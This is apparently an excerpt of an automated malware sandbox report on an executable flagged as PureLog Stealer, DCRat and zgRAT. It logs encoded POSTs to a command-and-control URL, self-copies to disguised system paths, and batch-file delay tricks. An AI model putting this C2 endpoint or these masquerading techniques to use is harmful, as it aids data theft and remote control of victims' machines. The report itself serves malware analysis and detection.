Jan 13, 2025 13:34:25.303446054 CET	1031	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:34:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5XYcVl0t7o5%2FZojxvQspU5BGAMyChlbrA5PijAuvj8oTE23Ap5BPRzS0SP91fou9qoyOjRqnF7ZZ9AGS8h6Ou0VOgi9VQq%2FLDUoV%2BiL63NsAm1pRveRqZ3%2Fs%2FiXrGtMJXGDMs%2FXHfI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156b9a7ed443b3-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1530&rtt_var=744&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=617&delivery_rate=659439&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.9	49982	104.21.112.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:34:49.404059887 CET	273	OUT	POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 977255cm.nyashkoon.in Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:34:49.773576975 CET	336	OUT	Data Raw: 05 02 04 03 03 0c 01 06 05 06 02 01 02 05 01 02 00 02 05 09 02 07 03 08 00 51 0d 07 04 07 01 50 0f 55 04 09 01 01 04 50 0c 07 06 0a 04 03 06 06 06 06 0b 0b 0f 57 05 01 04 52 03 04 04 00 05 08 05 06 0c 09 07 0e 06 03 0c 04 0d 0e 0d 50 0d 01 05 02 Data Ascii: QPUPWRPVQ\L~N~ca[crn_uu{PBew\|\|]hoU{{pX}}oUw^tu~V@@xmrL}uy
Jan 13, 2025 13:34:49.861040115 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:34:50.089639902 CET	1028	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:34:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=09tmn%2B02CP7pnm752qzymvA5%2B4khjqAymkRPF7ncMipkP%2BApE%2BoYc6N2B8WfF8CzZtXDzWdqc6cYXMBiYheYBUynBgA5v%2BUNtR5NjBc75siub00w28ErL7bL45d6c7xvIFzSckeLTBg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156c355eb9c34f-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=1479&rtt_var=1664&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=609&delivery_rate=246788&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.9	49983	104.21.112.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:34:57.467564106 CET	309	OUT	POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 977255cm.nyashkoon.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:34:57.818169117 CET	344	OUT	Data Raw: 05 05 01 05 06 0a 01 06 05 06 02 01 02 01 01 03 00 02 05 0c 02 0d 03 00 02 56 0c 04 04 07 00 04 0c 00 04 0f 07 0d 04 00 0f 07 05 56 06 06 02 02 03 00 0e 5b 0f 53 06 0a 07 05 03 07 05 01 05 5f 03 0a 0a 0c 07 53 01 04 0d 03 0f 01 0c 03 0c 54 02 0c Data Ascii: VV[S_ST\L}U\|`[[trnXuoU\|BScU\|OhMtDxogo^qZ\|sStYh~O~V@x}rbW
Jan 13, 2025 13:34:57.925517082 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:34:58.150898933 CET	1036	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:34:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5N23iauiF%2BSjajvE%2FCQ1pwi8RedVAxtRY8pn7JYahe95XLXt2u%2BATAgpjv%2FkJ3Wrp6cRyWQB%2B%2BJEF2SeiIWnxn0l8L6vlMov6VnH9w092S8qypE3Q0nJD%2FZV179iSOSbPmxdcaI%2BZiI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156c67cbde727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4318&min_rtt=1940&rtt_var=5483&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=653&delivery_rate=69643&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.9	49984	104.21.112.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:35:01.398030043 CET	273	OUT	POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 977255cm.nyashkoon.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:35:01.753329992 CET	344	OUT	Data Raw: 00 02 01 02 06 0a 01 0a 05 06 02 01 02 07 01 03 00 05 05 0b 02 05 03 0c 07 04 0f 53 04 07 01 57 0f 03 06 01 00 0c 06 50 0b 06 02 0b 07 03 06 0f 04 51 0d 08 0f 55 01 07 04 05 03 04 04 51 07 0a 02 53 0d 0e 07 55 01 08 0f 07 0e 54 0e 02 0c 56 07 0c Data Ascii: SWPQUQSUTVPY\WPV\L}T\|`jvab^wuRBeBtpLk]lxBElNu^\|wPwgs]~u~V@Ax}nL}ba
Jan 13, 2025 13:35:01.852637053 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:35:02.080626965 CET	1023	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:35:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bYTMW7wgqsfVIlb4LA3FJmb3KogBAo%2FCNBOOl96VmuY0zPh0fszpi%2FqLBGuGyC8XsWotidjA36qILKV3RG1cK9%2FfWxBYkIUkYk3rEY8FcOyfbaa2cBFQgPFgTBxbvKuPApOwVdVQaEQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156c804a63727b-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3917&min_rtt=2010&rtt_var=4569&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=617&delivery_rate=84529&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.9	49985	104.21.112.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:35:04.502047062 CET	309	OUT	POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 977255cm.nyashkoon.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:35:04.847848892 CET	344	OUT	Data Raw: 00 00 04 01 06 09 01 05 05 06 02 01 02 00 01 0a 00 05 05 0e 02 0c 03 0b 00 51 0a 07 03 0f 00 50 0c 07 06 5e 03 0c 06 07 0e 50 04 0b 05 56 05 03 06 53 0b 00 0e 06 07 04 06 0f 03 07 05 52 06 09 00 56 0e 0d 06 07 01 00 0b 0f 0b 0f 0a 06 0c 52 07 07 Data Ascii: QP^PVSRVRS]SU\L~N\|j`Lau\tOhB}ts\slKyoo{^WXh}wPtdp}e~V@zmnr}
Jan 13, 2025 13:35:04.967708111 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:35:05.203381062 CET	1024	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:35:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mX0m1aTWnFkqTIS1C5wDzkMmqnliKIsqgbQUxiZaa9GaJyOFnpsOWZTeod3FeX2rnmqoG%2BsMSgoor0raxHxUOhG9ZgG0mkbJ%2BWPccyPAT40VVuPS6lmAyfKRxUSZfgjENNHtWlLpWd0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156c93ba60729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3507&min_rtt=1922&rtt_var=3891&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=653&delivery_rate=99972&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Target ID:	0
Start time:	07:32:57
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Imagebase:	0xaf0000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1339348052.0000000000AF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1396182638.0000000013041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:33:00
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.cmdline"
Imagebase:	0x7ff617d20000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:33:00
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:33:00
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB99.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCF6FBA02FA6D54D1FBEF275314C5F713F.TMP"
Imagebase:	0x7ff6c3ca0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:33:01
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.cmdline"
Imagebase:	0x7ff617d20000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:33:01
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:33:01
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE49.tmp" "c:\Windows\System32\CSCEE8385358E3E4E5C92A1AE5417196AA8.TMP"
Imagebase:	0x7ff6c3ca0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:33:02
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\62xZ8bmi7l.bat"
Imagebase:	0x7ff717750000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:33:02
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:33:02
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6043a0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:33:02
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7bf000000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:33:12
Start date:	13/01/2025
Path:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Imagebase:	0xee0000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:33:13
Start date:	13/01/2025
Path:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Imagebase:	0xb60000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:33:16
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xDZppRkgYb.bat"
Imagebase:	0x7ff717750000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:33:16
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:33:16
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6043a0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:33:16
Start date:	13/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff6b7fd0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:33:21
Start date:	13/01/2025
Path:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Imagebase:	0xb60000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	07:33:22
Start date:	13/01/2025
Path:	C:\Program Files\Internet Explorer\images\dwm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Internet Explorer\images\dwm.exe"
Imagebase:	0x760000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Internet Explorer\images\dwm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\images\dwm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\images\dwm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\images\dwm.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:33:30
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Imagebase:	0x770000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	07:33:33
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Ye8GjO9RaC.bat" "
Imagebase:	0x7ff717750000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	07:33:33
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	07:33:33
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6043a0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:33:33
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7bf000000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:33:38
Start date:	13/01/2025
Path:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Imagebase:	0xb80000
File size:	1'685'504 bytes
MD5 hash:	13A9FE232C423531F428E7EBF5BCC3CE
Has elevated privileges:	false
Has administrator privileges:	false
